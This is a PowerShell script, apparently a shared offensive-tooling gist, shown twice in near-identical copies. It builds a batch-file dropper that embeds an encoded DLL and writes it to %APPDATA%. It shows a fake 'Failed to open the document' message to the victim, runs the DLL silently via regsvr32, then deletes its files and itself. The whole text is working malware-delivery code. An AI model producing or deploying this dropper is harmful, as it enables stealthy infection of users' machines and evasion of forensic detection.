xorrior/New-RegSvr32BatchFile.ps1

## New-RegSvr32BatchFile.ps1
function New-RegSvr32BatchFile
{
    <#
    .SYNOPSIS
    Generates a batch file which will contain a certutil encoded, cab compressed payload.

    .DESCRIPTION
    The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.

    Create payload:
    1. makecab payload.dll "payload.cab"
    2. certutil -encode payload.cab payload.txt

    .PARAMETER CabCompressedPayload
    File path to the  cab compressed and encoded payload.

    .PARAMETER BatchFilePath
    Path to output the resulting bat file.

    .PARAMETER InlinePath
    The path to output the resulting payload. Placed in the bat file.

    .EXAMPLE

    New-RegSvr32BatchFile -CabCompressedPayload payload.txt

    Generate a bat file from the file payload.txt with all of the default parameter values.

    #>
    [CmdletBinding()]
    param
    (
        [Parameter(Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [string]$CabCompressedPayload,

        [Parameter()]
        [ValidateNotNullOrEmpty()]
        [string]$BatchFilePath = "malicious.bat",

        [Parameter()]
        [ValidateNotNullOrEmpty()]
        [string]$InlinePath = "%appdata%\debug.dll"
    )

    $TemplateBatch = @"
@ECHO OFF
SET OutDll=`"$InlinePath`"
SET dropPath="%APPDATA%\debug.txt"
INLINEENCODING
setlocal enabledelayedexpansion
(
    ECHOCMDLINES
) > %dropPath%
endlocal
certutil -decode "%dropPath%" "temp.cab"
expand temp.cab "%OutDll%"
ECHO Failed to open the document
start /b regsvr32 /s "%OutDll%"
timeout /t 5 /nobreak > NUL
del "%dropPath%"
del temp.cab
start /b "" cmd /c del "%~f0"&exit /b
"@

    $certUtilEncodedBinary = Get-Content -Encoding Ascii $CabCompressedPayload
    $count = 1
    $batchFormattedBinary = $certUtilEncodedBinary | % {"SET `"line$count=$_`"";$count+=1}
    $count = 1
    $echolines = $certUtilEncodedBinary | % {"echo !line$count!";$count+=1}

    $TemplateBatch = $TemplateBatch.Replace("INLINEENCODING",$batchFormattedBinary -join "`n")
    $TemplateBatch = $TemplateBatch.Replace("ECHOCMDLINES",$echolines -join "`n`t")
    $TemplateBatch = $TemplateBatch -creplace '(?m)^\s*\r?\n',''

    $TemplateBatch | Out-File -Encoding ascii $BatchFilePath -Force

    Get-ChildItem -Path $BatchFilePath
}
	function New-RegSvr32BatchFile
	{
	<#
	.SYNOPSIS
	Generates a batch file which will contain a certutil encoded, cab compressed payload.

	.DESCRIPTION
	The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.

	Create payload:
	1. makecab payload.dll "payload.cab"
	2. certutil -encode payload.cab payload.txt

	.PARAMETER CabCompressedPayload
	File path to the cab compressed and encoded payload.

	.PARAMETER BatchFilePath
	Path to output the resulting bat file.

	.PARAMETER InlinePath
	The path to output the resulting payload. Placed in the bat file.

	.EXAMPLE

	New-RegSvr32BatchFile -CabCompressedPayload payload.txt

	Generate a bat file from the file payload.txt with all of the default parameter values.

	#>
	[CmdletBinding()]
	param
	(
	[Parameter(Mandatory = $True)]
	[ValidateNotNullOrEmpty()]
	[string]$CabCompressedPayload,

	[Parameter()]
	[ValidateNotNullOrEmpty()]
	[string]$BatchFilePath = "malicious.bat",

	[Parameter()]
	[ValidateNotNullOrEmpty()]
	[string]$InlinePath = "%appdata%\debug.dll"
	)

	$TemplateBatch = @"
	@ECHO OFF
	SET OutDll=`"$InlinePath`"
	SET dropPath="%APPDATA%\debug.txt"
	INLINEENCODING
	setlocal enabledelayedexpansion
	(
	ECHOCMDLINES
	) > %dropPath%
	endlocal
	certutil -decode "%dropPath%" "temp.cab"
	expand temp.cab "%OutDll%"
	ECHO Failed to open the document
	start /b regsvr32 /s "%OutDll%"
	timeout /t 5 /nobreak > NUL
	del "%dropPath%"
	del temp.cab
	start /b "" cmd /c del "%~f0"&exit /b
	"@

	$certUtilEncodedBinary = Get-Content -Encoding Ascii $CabCompressedPayload
	$count = 1
	$batchFormattedBinary = $certUtilEncodedBinary \| % {"SET `"line$count=$_`"";$count+=1}
	$count = 1
	$echolines = $certUtilEncodedBinary \| % {"echo !line$count!";$count+=1}

	$TemplateBatch = $TemplateBatch.Replace("INLINEENCODING",$batchFormattedBinary -join "`n")
	$TemplateBatch = $TemplateBatch.Replace("ECHOCMDLINES",$echolines -join "`n`t")
	$TemplateBatch = $TemplateBatch -creplace '(?m)^\s*\r?\n',''

	$TemplateBatch \| Out-File -Encoding ascii $BatchFilePath -Force

	Get-ChildItem -Path $BatchFilePath
	}